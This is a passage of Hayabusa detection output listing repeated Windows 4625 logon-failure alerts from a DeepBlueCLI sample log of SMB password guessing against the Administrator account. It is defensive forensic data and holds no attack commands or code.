NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: 